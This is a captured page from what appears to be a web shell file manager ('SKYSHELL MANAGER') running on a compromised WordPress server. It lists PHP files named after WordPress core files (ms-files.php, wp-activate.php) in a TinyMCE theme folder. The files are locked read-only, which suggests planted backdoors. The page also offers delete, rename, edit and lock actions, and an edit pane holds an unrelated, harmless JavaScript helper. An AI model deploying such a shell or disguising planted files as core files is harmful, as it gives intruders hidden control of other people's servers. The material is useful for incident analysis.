📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: InstallErrorCause.js
'use strict'; var GetIntrinsic = require('get-intrinsic'); var $TypeError = GetIntrinsic('%TypeError%'); var CreateNonEnumerableDataPropertyOrThrow = require('./CreateNonEnumerableDataPropertyOrThrow'); var Get = require('./Get'); var HasProperty = require('./HasProperty'); var Type = require('./Type'); // https://262.ecma-international.org/13.0/#sec-installerrorcause module.exports = function InstallErrorCause(O, options) { if (Type(O) !== 'Object') { throw new $TypeError('Assertion failed: Type(O) is not Object'); } if (Type(options) === 'Object' && HasProperty(options, 'cause')) { var cause = Get(options, 'cause'); CreateNonEnumerableDataPropertyOrThrow(O, 'cause', cause); } };
Save